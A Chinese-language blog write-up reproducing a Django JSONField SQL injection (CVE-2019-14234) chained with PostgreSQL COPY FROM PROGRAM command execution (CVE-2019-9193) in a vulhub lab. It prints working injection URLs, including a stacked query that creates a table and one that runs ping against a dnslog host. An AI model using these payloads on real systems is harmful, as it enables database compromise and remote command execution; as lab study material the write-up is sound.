0%

DjangoJSONFieldSQL注入漏洞(CVE-2019-14234&CVE-2019-9193)

漏洞描述


声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。

什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。

相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。

参考:https://cloud.tencent.com/developer/article/1549898


影响版本


Django

1.11.x before 1.11.23

2.1.x before 2.1.11

2.2.x before 2.2.4


FOFA语句

1

环境搭建

docker搭建

1
git clone https://github.com/vulhub/vulhub.gitcd vulhub/django/CVE-2019-14234/docker-compose up -d

访问http://ip:8000可以正常访问说明搭建成功;

image-20211111165927552

漏洞复现

漏洞原理

该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。

Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。

image-20211111165724976

通过JSONField类获得KeyTransform类并生成sql语句的位置。

其中key_name是可控的字符串,最终生成的语句是WHERE (field->’[key_name]’) = ‘value’,因此可以进行SQL注入。

漏洞利用

浏览器访问:

1
http://ip:8000/admin/vuln/collection/

image-20211111170100803

构造URL进行查询;

1
http://ip:8000/admin/vuln/collection/?detail__a%27b=123

image-20211111170206324

注入成功!

结合CVE-2019-9193漏洞,验证命令注入语句,构造如下:

1
http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

image-20211111170550314

页面结果出现报错。报错原因是no results to fetch,说明语句已经成功执行;

然后用dnslog检测是否可以执行命令;

1
http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping xxxx.dnslog.cn'--%20

image-20211111171012284

当然,也可以直接进入到容器,看到ping命令执行成功;

image-20211111171438501

欢迎关注我的其它发布渠道